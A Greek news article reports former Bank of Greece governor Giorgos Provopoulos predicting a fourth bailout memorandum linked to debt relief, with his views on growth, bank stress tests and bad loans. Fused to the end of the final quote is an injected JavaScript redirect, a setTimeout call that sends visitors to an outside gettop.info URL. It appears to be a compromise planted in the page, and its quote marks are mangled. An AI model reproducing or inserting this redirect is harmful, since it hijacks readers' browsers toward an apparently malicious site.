Παρέμβαση Προβόπουλου: Έρχεται 4ο μνημόνιο που θα συνδεθεί με το χρέος

0
4

 

 Προειδοποιητικό μήνυμα προς το πολιτικό και οικονομικό σύστημα στέλνει ο πρώην διοικητής της Τράπεζας της Ελλάδος Γιώργος Προβόπουλος.

Σε δηλώσεις του στο bankingnews.gr αναφέρει ότι υπάρχει μεγάλη πιθανότητα να υπάρξει 4ο μνημόνιο που θα συνδεθεί με το χρέος, ενώ τόνισε ότι δεν υπάρχουν οι προυποθέσεις για μια βιώσιμη ανάπτυξη στην Ελλάδα.

Επίσης, εξέφρασε τις ανησυχίες του για τις ελληνικές τράπεζες και για τα stress tests του 2018.

H διευθέτηση του δημόσιου χρέους θα συνοδευτεί με ένα νέο πρόγραμμα, δηλαδή ένα 4ο μνημόνιο, τόνισε ο πρώην διοικητής της Τράπεζας της Ελλάδας, Γιώργος Προβόπουλος.

Όπως σημείωσε χαρακτηριστικά: «Θεωρώ ότι είναι πολιτικά πολύ δύσκολο, για να μην πω ανέφικτο, να δοθούν επιπλέον χρήματα στην Ελλάδα , ύστερα από τρία μνημόνια που απορρόφησαν πρωτοφανούς ύψους κονδύλια και μάλιστα με μερική μόνον επιτυχία, όπως τουλάχιστον το βλέπουν πολλές Ευρωπαϊκές κυβερνήσεις.

Προβλέπω όμως ότι η διευθέτηση του δημόσιου χρέους μετά το 2017 θα συνδυαστεί με την υποχρέωση υλοποίησης εκ μέρους μας συγκεκριμένων στόχων και μάλιστα με ορίζοντα πολυετή.

Αυτό το μεσομακροχρόνιο πρόγραμμα θα μπορούσε να θεωρηθεί ως ένα τέταρτο μνημόνιο.

Θα περιλαμβάνει δηλαδή τις δεσμεύσεις που αναλαμβάνει η χώρα έναντι των παραχωρήσεων που θα κάνουν οι πιστωτές μας στο θέμα του χρέους(Conditionality).

Εκτιμώ μάλιστα ότι οι δεσμεύσεις αυτές κάθε άλλο παρά ανώδυνες θα είναι«.

Όσο για το πώς βλέπει να εξελίσσεται η ελληνική οικονομία, ο κ. Προβόπουλος σημείωσε: «Η χώρα έχει τηρήσει σχεδόν όλες τις δεσμεύσεις των μνημονίων, ωστόσο η οικονομία βρίσκεται σε κρίση διαρκείας.

Έχουν περάσει αρκετά χρόνια από την υπογραφή του πρώτου μνημονίου κι όμως η αβεβαιότητα για το μέλλον εξακολουθεί και σήμερα να είναι μεγάλη.

Για να επιτευχθεί διατηρήσιμη και ισχυρή ανάπτυξη, που είναι το κύριο ζητούμενο, η απλή νομοθέτηση των μνημονιακών μέτρων δεν αρκεί.

Χρειάζονται πιο τολμηρά μεταρρυθμιστικά βήματα, ισχυρή πολιτική δέσμευση, σωστή υλοποίηση, στέρεοι θεσμοί και μια διάχυτη στο πολιτικό σύστημα και την κοινωνία κουλτούρα, που να ενθαρρύνει τις επενδύσεις, την καινοτομία και την επιχειρηματικότητα.

Όσο αυτά δεν υπάρχουν, βιώσιμη και ισχυρή ανάπτυξη δεν θα έρθει. Βέβαια και το διεθνές κλίμα έχει τελευταία επιδεινωθεί, δυσκολεύοντας την έξοδο της χώρας από το σκοτεινό τούνελ«.

Αναφορικά με τα κόκκινα δάνεια είπε: «Το σχέδιο που είχα προτείνει προέβλεπε την συνολική αντιμετώπιση των κόκκινων δανείων, με τρόπο που θα αναδιέτασσε το επιχειρηματικό τοπίο εκ βάθρων.

Στη διάρκεια της έντονης και παρατεταμένης κρίσης που βίωσε η χώρα, ο μόνος κλάδος που ριζικά αναδιατάχθηκε ήταν ο τραπεζικός, με πρωτοβουλίες μάλιστα της Τράπεζας της Ελλάδος.

Αντίστοιχη αναδιάταξη στους λοιπούς επιχειρηματικούς τομείς δεν έγινε. Κακώς, κατά την γνώμη μου. Γι’ αυτό είχα εισηγηθεί την αντιμετώπιση του θέματος των κόκκινων δανείων, εκ μέρους των τραπεζών και το ΤΧΣ, με τρόπο που θα οδηγούσε σε ένα νέο, υγιέστερο και αποδοτικότερο, επιχειρηματικό τοπίο».

Όπως τόνισε ο κ. Προβόπουλος, ένα τέτοιο σχέδιο «θα σήμαινε ότι επιχειρήσεις μη βιώσιμες θα έκλειναν, άλλες θα συγχωνεύονταν μεταξύ τους, ώστε να σχηματίσουν πιο δυναμικές και αποτελεσματικές μονάδες, ενώ οι τράπεζες θα κούρευαν, κατά περίπτωση, ένα μέρος των χρεών, ώστε να δοθεί νέα ορμή και προοπτική στις ασθμαίνουσες από τα χρέη σήμερα επιχειρήσεις.

Οι παλαιοί μέτοχοι θα έπρεπε, επίσης, να βάλουν το χέρι στην τσέπη φέρνοντας νέα κεφάλαια στις επιχειρήσεις τους, ουσιαστικά αυτές που είχαν ανεπαρκή η μηδενικά κεφάλαια. Αν δεν το έκαναν, οι τράπεζες θα έπρεπε να μετοχοποιήσουν μέρος του δανείου και να αναλάβουν, ως μέτοχοι πλέον, να αντικαταστήσουν τις διοικήσεις των εταιριών με νέα δυναμικά στελέχη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here